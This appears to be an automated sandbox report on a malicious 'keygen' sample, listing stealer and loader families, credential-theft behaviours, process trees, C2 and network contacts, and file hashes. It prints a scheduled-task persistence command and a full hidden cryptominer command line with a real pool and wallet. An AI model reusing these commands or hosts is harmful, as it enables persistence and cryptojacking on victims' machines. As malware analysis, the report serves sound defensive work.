Analysis Overview
SHA256
813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46
Threat Level: Known bad
The file 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46 was found to be: Known bad.
Malicious Activity Summary
Ffdroider family
Pony,Fareit
Fabookie family
Detect Fabookie payload
PrivateLoader
FFDroider payload
Azorult family
Gcleaner family
Pony family
OnlyLogger
Onlylogger family
FFDroider
Fabookie
GCleaner
Privateloader family
Azorult
OnlyLogger payload
Deletes itself
Unsecured Credentials: Credentials In Files
Reads data files stored by FTP clients
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Accesses Microsoft Outlook profiles
Accesses Microsoft Outlook accounts
Looks up external IP address via web service
Checks installed software on the system
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
outlook_win_path
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Checks SCSI registry key(s)
Runs ping.exe
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 22:25
Signatures
Azorult family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win10v2004-20241007-en
Max time kernel
96s
Max time network
139s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Azorult
Azorult family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
Files
memory/2396-0-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
143s
Command Line
Signatures
Azorult
Azorult family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
memory/1832-0-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win7-20241023-en
Max time kernel
117s
Max time network
117s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2604 wrote to memory of 2596 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2604 wrote to memory of 2596 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2604 wrote to memory of 2596 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2604 wrote to memory of 2596 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104711 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
Files
memory/2604-1-0x0000000000400000-0x00000000004E5000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Ffdroider family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jhuuee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4312 set thread context of 3864 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4580 -ip 4580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4580 -ip 4580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4580 -ip 4580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4580 -ip 4580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4580 -ip 4580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4580 -ip 4580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4580 -ip 4580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1136
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5016 -ip 5016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 352
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4580 -ip 4580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1180
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 8.8.8.8:53 | 3.171.2.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | 76.149.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 68.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| SG | 37.0.10.214:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| SG | 37.0.10.244:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| DE | 51.195.43.17:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 17.43.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 212.47.253.124:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.253.47.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
| MD5 | 7126148bfe5ca4bf7e098d794122a9a3 |
| SHA1 | 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64 |
| SHA256 | f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5 |
| SHA512 | 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
| MD5 | 8902f8193024fa4187ca1aad97675960 |
| SHA1 | 37a4840c9657205544790c437698b54ca33bfd9d |
| SHA256 | 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f |
| SHA512 | c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938 |
memory/840-33-0x000000007283E000-0x000000007283F000-memory.dmp
